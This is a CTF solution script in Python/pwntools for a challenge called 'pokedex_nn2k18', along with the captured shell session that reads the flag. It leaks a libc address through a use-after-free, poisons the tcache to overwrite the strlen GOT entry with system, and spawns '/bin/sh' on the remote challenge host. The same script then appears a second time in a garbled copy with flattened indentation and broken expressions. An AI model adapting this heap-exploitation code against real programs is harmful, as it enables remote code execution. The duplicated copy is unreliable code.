soez/nn8ed - pokedex_nn2k18.py

## nn8ed - pokedex_nn2k18.py
from pwn import *

def menu():
	r.recvuntil("option> ")

def create(pos, name, height, weight, power):
	menu()
	r.sendline("1")
	r.recvuntil("Enter the new pokemon ID: ")
	r.sendline(str(pos))
	r.recvuntil("Name: ")
	r.sendline(name)
	r.recvuntil("Height: ")
	r.sendline(str(height))
	r.recvuntil("Weight: ")
	r.sendline(str(weight))
	r.recvuntil("Power: ")
	r.sendline(str(power))

def view(num):
	menu()
	r.sendline("4")
	r.recvuntil("Enter the ID to print: ")
	r.sendline(str(num))
	r.recvuntil("Name: ")
	return u64(r.recv(6).ljust(8, '\0'))

def delete(num):
	menu()
	r.sendline("3")
	r.recvuntil("Insert the ID to delete: ")
	r.sendline(str(num))

def edit(num, name, height, weight, power, shell=False):
	menu()
	r.sendline("2")
	r.recvuntil("Enter the ID to edit: ")
	r.sendline(str(num))
	r.recvuntil("New name: ")
	r.sendline(name)
	if shell: return
	r.recvuntil("Height: ")
	r.sendline(str(height))
	r.recvuntil("Weight: ")
	r.sendline(str(weight))
	r.recvuntil("Power: ")
	r.sendline(str(power))

local = False
libc = ELF("./libc-2.27.so")
env = {"LD_PRELOAD" : libc.path}
r = process("./pokedex_nn2k18", env=env) if local else remote("challenges.ka0labs.org", 1341)

create(0, "A"*2048, 1, 1, 100)
create(1, "B"*2048, 1, 1, 100)

delete(0)
base_libc = view(0) - 0x1b7ca0

hook = 0x404028 # @plt.got.strlen
system = base_libc + libc.symbols['system']
printf = base_libc + libc.symbols['printf']
read = base_libc + libc.symbols['read']
memcpy = base_libc + libc.symbols['memcpy']

print "[+] base_libc: 0x%x" % base_libc
print "[+] system: 0x%x" % system

create(2, "E"*32, 1, 1, 100)
create(3, "F"*32, 1, 1, 100)

delete(3)
import time
edit(3, p64(hook) + "F"*24 + "A"*8 + p64(0x21) + p64(hook), 1, 1, 100) # poisoning tcache
time.sleep(0.5)
create(4, "G"*32, 1, 1, 100)
time.sleep(0.5)
create(5, p64(system) + p64(printf) + p64(read) + p64(memcpy), 1, 1, 100) # return malloc to plt.got.strlen and overwriting with system
time.sleep(0.5)
edit(4, "/bin/sh\0", 1, 1, 100, True)

r.interactive()

'''
$ id
uid=1000 gid=1000 groups=1000,24,25,29,30,44,46,108
$ ls
bin
flag.txt
lib
lib64
pokedex
$ cat flag.txt
nn8ed{Tc4che_c0rrupt10n_FTW!}
'''
	from pwn import *

	def menu():
	r.recvuntil("option> ")

	def create(pos, name, height, weight, power):
	menu()
	r.sendline("1")
	r.recvuntil("Enter the new pokemon ID: ")
	r.sendline(str(pos))
	r.recvuntil("Name: ")
	r.sendline(name)
	r.recvuntil("Height: ")
	r.sendline(str(height))
	r.recvuntil("Weight: ")
	r.sendline(str(weight))
	r.recvuntil("Power: ")
	r.sendline(str(power))

	def view(num):
	menu()
	r.sendline("4")
	r.recvuntil("Enter the ID to print: ")
	r.sendline(str(num))
	r.recvuntil("Name: ")
	return u64(r.recv(6).ljust(8, '\0'))

	def delete(num):
	menu()
	r.sendline("3")
	r.recvuntil("Insert the ID to delete: ")
	r.sendline(str(num))

	def edit(num, name, height, weight, power, shell=False):
	menu()
	r.sendline("2")
	r.recvuntil("Enter the ID to edit: ")
	r.sendline(str(num))
	r.recvuntil("New name: ")
	r.sendline(name)
	if shell: return
	r.recvuntil("Height: ")
	r.sendline(str(height))
	r.recvuntil("Weight: ")
	r.sendline(str(weight))
	r.recvuntil("Power: ")
	r.sendline(str(power))

	local = False
	libc = ELF("./libc-2.27.so")
	env = {"LD_PRELOAD" : libc.path}
	r = process("./pokedex_nn2k18", env=env) if local else remote("challenges.ka0labs.org", 1341)

	create(0, "A"*2048, 1, 1, 100)
	create(1, "B"*2048, 1, 1, 100)

	delete(0)
	base_libc = view(0) - 0x1b7ca0

	hook = 0x404028 # @plt.got.strlen
	system = base_libc + libc.symbols['system']
	printf = base_libc + libc.symbols['printf']
	read = base_libc + libc.symbols['read']
	memcpy = base_libc + libc.symbols['memcpy']

	print "[+] base_libc: 0x%x" % base_libc
	print "[+] system: 0x%x" % system

	create(2, "E"*32, 1, 1, 100)
	create(3, "F"*32, 1, 1, 100)

	delete(3)
	import time
	edit(3, p64(hook) + "F"24 + "A"8 + p64(0x21) + p64(hook), 1, 1, 100) # poisoning tcache
	time.sleep(0.5)
	create(4, "G"*32, 1, 1, 100)
	time.sleep(0.5)
	create(5, p64(system) + p64(printf) + p64(read) + p64(memcpy), 1, 1, 100) # return malloc to plt.got.strlen and overwriting with system
	time.sleep(0.5)
	edit(4, "/bin/sh\0", 1, 1, 100, True)

	r.interactive()

	'''
	$ id
	uid=1000 gid=1000 groups=1000,24,25,29,30,44,46,108
	$ ls
	bin
	flag.txt
	lib
	lib64
	pokedex
	$ cat flag.txt
	nn8ed{Tc4che_c0rrupt10n_FTW!}
	'''